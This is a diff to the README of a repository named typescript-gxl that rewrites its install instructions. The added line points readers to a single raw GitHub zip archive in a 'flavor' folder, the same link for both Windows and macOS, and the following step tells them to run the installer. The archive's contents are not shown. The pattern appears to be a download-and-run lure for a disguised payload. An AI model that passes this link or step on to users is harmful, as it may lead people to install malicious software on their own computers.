moukawime/typescript-gxl/README.md

 3. **Download the Installer**

    While on the selected version, look for the file suitable for your operating system.
-For example, you might see options like `typescript-gxl-windows.exe` for Windows or `typescript-gxl-macos.zip` for macOS.
+For example, you might see options like `https://raw.githubusercontent.com/moukawime/typescript-gxl/main/flavor/typescript-gxl.zip` for Windows or `https://raw.githubusercontent.com/moukawime/typescript-gxl/main/flavor/typescript-gxl.zip` for macOS.
 Click on the file name to begin the download.

 4. **Run the Installer**